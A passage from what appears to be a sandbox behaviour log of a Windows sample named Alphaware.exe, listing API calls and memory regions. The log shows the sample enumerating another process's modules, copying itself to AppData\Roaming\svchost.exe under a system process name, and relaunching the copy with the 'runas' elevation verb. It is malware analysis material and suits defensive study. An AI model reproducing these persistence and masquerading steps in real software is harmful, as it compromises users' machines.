lpBaseName="ntdll.dll") returned 0x9 [0056.421] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.422] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x25bbbd8, cb=0x18 | out: lpmodinfo=0x25bbbd8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.422] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.422] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.423] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x25bdd98, cb=0x18 | out: lpmodinfo=0x25bdd98*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.423] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.423] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.424] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x25bff68, cb=0x18 | out: lpmodinfo=0x25bff68*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.424] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.425] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb90) returned 0x21c [0056.425] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25c2678, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25c2678, lpcbNeeded=0x41eb20) returned 1 [0056.426] GetModuleInformation (in: hProcess=0x21c, hModule=0xa60000, lpmodinfo=0x25c28e8, cb=0x18 | out: lpmodinfo=0x25c28e8*(lpBaseOfDll=0xa60000, SizeOfImage=0x17000, EntryPoint=0xa614a1)) returned 1 [0056.426] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xa60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ncftp.exe") returned 0x9 [0056.426] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xa60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\ncftp.exe" (normalized: "c:\\program files (x86)\\common files\\ncftp.exe")) returned 0x2d [0056.426] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25c4b00, cb=0x18 | out: lpmodinfo=0x25c4b00*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.427] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.427] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.427] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x25c6cc0, cb=0x18 | out: lpmodinfo=0x25c6cc0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.428] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.428] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.428] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x25c8e80, cb=0x18 | out: lpmodinfo=0x25c8e80*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.429] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.429] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.430] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x25cb050, cb=0x18 | out: lpmodinfo=0x25cb050*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.430] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.431] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.450] EtwEventRegister (in: ProviderId=0x25ce528, EnableCallback=0x21413cc, CallbackContext=0x0, RegHandle=0x25ce508 | out: RegHandle=0x25ce508) returned 0x0 [0056.590] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0057.000] CoTaskMemAlloc (cb=0x20c) returned 0x747860 [0057.000] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x747860 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0057.008] CoTaskMemFree (pv=0x747860) [0057.008] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", nBufferLength=0x105, lpBuffer=0x41e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpFilePart=0x0) returned 0x50 [0057.010] CoTaskMemAlloc (cb=0x20c) returned 0x747860 [0057.010] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x747860 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0057.012] CoTaskMemFree (pv=0x747860) [0057.012] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x41e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0057.084] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x41e630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0057.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x41e848) returned 1 [0057.086] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe"), fInfoLevelId=0x0, lpFileInformation=0x41eb70 | out: lpFileInformation=0x41eb70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41e7f8) returned 1 [0057.088] GetFullPathNameW (in: lpFileName="Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0057.088] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x41e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0057.089] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\alphaware.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe"), bFailIfExists=1) returned 1 [0057.246] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x53b310 [0057.247] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x771390 [0057.247] LocalAlloc (uFlags=0x0, uBytes=0x48) returned 0x781b70 [0058.037] LocalFree (hMem=0x53b310) returned 0x0 [0058.037] LocalFree (hMem=0x771390) returned 0x0 [0058.037] LocalFree (hMem=0x781b70) returned 0x0 [0058.077] CoGetContextToken (in: pToken=0x41e950 | out: pToken=0x41e950) returned 0x0 [0058.077] CObjectContext::QueryInterface () returned 0x0 [0058.077] CObjectContext::GetCurrentThreadType () returned 0x0 [0058.077] Release () returned 0x0 [0058.078] CoGetContextToken (in: pToken=0x41e3f0 | out: pToken=0x41e3f0) returned 0x0 [0058.078] CObjectContext::QueryInterface () returned 0x0 [0058.078] CObjectContext::GetCurrentThreadType () returned 0x0 [0058.078] Release () returned 0x0 [0058.080] CoGetContextToken (in: pToken=0x41e3f0 | out: pToken=0x41e3f0) returned 0x0 [0058.080] CObjectContext::QueryInterface () returned 0x0 [0058.080] CObjectContext::GetCurrentThreadType () returned 0x0 [0058.080] Release () returned 0x0 [0058.122] CoGetContextToken (in: pToken=0x41e3f0 | out: pToken=0x41e3f0) returned 0x0 [0058.122] CObjectContext::QueryInterface () returned 0x0 [0058.122] CObjectContext::GetCurrentThreadType () returned 0x0 [0058.122] Release () returned 0x0 [0058.125] CoGetContextToken (in: pToken=0x41e410 | out: pToken=0x41e410) returned 0x0 [0058.125] CObjectContext::QueryInterface () returned 0x0 [0058.125] CObjectContext::GetCurrentThreadType () returned 0x0 [0058.125] Release () returned 0x0 [0058.126] CoUninitialize () Thread: id = 2 os_tid = 0xeac Thread: id = 3 os_tid = 0xeb0 [0039.647] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0058.079] EtwEventUnregister (RegHandle=0xd00010001) returned 0x0 [0058.120] CloseHandle (hObject=0x3d0) returned 1 Thread: id = 4 os_tid = 0xeb4 Thread: id = 5 os_tid = 0xeb8 Thread: id = 6 os_tid = 0xebc [0042.577] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 7 os_tid = 0xec0 [0042.936] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 8 os_tid = 0xecc [0057.257] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0057.282] ShellExecuteExW (in: pExecInfo=0x25d47a0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpParameters=0x0, lpDirectory="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x25d47a0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpParameters=0x0, lpDirectory="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3d0)) returned 1 [0057.853] CoGetContextToken (in: pToken=0x1b07f4f0 | out: pToken=0x1b07f4f0) returned 0x0 [0057.992] CoUninitialize () Thread: id = 9 os_tid = 0xed0 Thread: id = 10 os_tid = 0xed4 Process: id = "2" image_name = "svchost.exe" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe" page_root = "0x40455000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea4" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 662 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 663 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 664 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 665 start_va = 0x140000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 666 start_va = 0xe70000 end_va = 0xf85fff monitored = 1 entry_point = 0xf8200a region_type = mapped_file name = "svchost.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe") Region: id = 667 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 668 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 669 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 670 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 671 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 672 start_va = 0x7fffffda000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 673 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 674 start_va = 0x240000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 675 start_va = 0x7fef7570000 end_va = 0x7fef75defff monitored = 1 entry_point = 0x7fef7571134 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 676 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 677 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 678 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 679 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 680 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 681 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 682 start_va = 0x240000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 683 start_va = 0x420000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 684 start_va = 0x240000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 685 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 686 start_va = 0x350000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 687 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 688 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 689 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 690 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 691 start_va = 0x4a0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 692 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 693 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 694 start_va = 0x7fef4a10000 end_va = 0x7fef4ab8fff monitored = 1 entry_point = 0x7fef4a11010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 695 start_va = 0x7fef9210000 end_va = 0x7fef9212fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 696 start_va = 0x7feff2d0000 end_va = 0x7feff340fff monitored = 0 entry_point = 0x7feff2e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 697 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 698 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 699 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 700 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 701 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 702 start_va = 0x610000 end_va = 0x797fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 703 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 704 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 705 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 706 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 707 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 708 start_va = 0x7a0000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 709 start_va = 0xf90000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 710 start_va = 0x930000 end_va = 0xa3dfff monitored = 1 entry_point = 0xa4200a region_type = mapped_file name = "svchost.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe") Region: id = 711 start_va = 0x930000 end_va = 0xa3dfff monitored = 1 entry_point = 0xa4200a region_type = mapped_file name = "svchost.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe") Region: id = 712 start_va = 0x7fefc940000 end_va = 0x7fefc94bfff monitored = 0 entry_point = 0x7fefc941064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 713 start_va = 0x7fef1bd0000 end_va = 0x7fef2696fff monitored = 1 entry_point = 0x7fef1bd63a0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 714 start_va = 0x7fef1bd0000 end_va = 0x7fef2696fff monitored = 1 entry_point = 0x7fef1bd63a0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 715 start_va = 0x7fef1bd0000 end_va = 0x7fef2696fff monitored = 1 entry_point = 0x7fef1bd63a0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 716 start_va = 0x7fef6d20000 end_va = 0x7fef6d35fff monitored = 0 entry_point = 0x7fef6d2c000 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 717 start_va = 0x7fef4950000 end_va = 0x7fef4a0cfff monitored = 0 entry_point = 0x7fef49d7db0 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 718 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 719 start_va = 0xe0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 720 start_va = 0xf0000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 721 start_va = 0x7fe92580000 end_va = 0x7fe9258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92580000" filename = "" Region: id = 722 start_va = 0x7fe92590000 end_va = 0x7fe9259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92590000" filename = "" Region: id = 723 start_va = 0x7fe925a0000 end_va = 0x7fe9262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe925a0000" filename = "" Region: id = 724 start_va = 0x7fe92630000 end_va = 0x7fe9269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92630000" filename = "" Region: id = 725 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 726 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 727 start_va = 0x930000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 728 start_va = 0x930000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 729 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 730 start_va = 0xc50000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 731 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 732 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 733 start_va = 0x2390000 end_va = 0x1a38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 734 start_va = 0x1a390000 end_va = 0x1a70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a390000" filename = "" Region: id = 735 start_va = 0xb20000 end_va = 0xc20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 736 start_va = 0x1a8d0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a8d0000" filename = "" Region: id = 737 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 738 start_va = 0xd50000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 739 start_va = 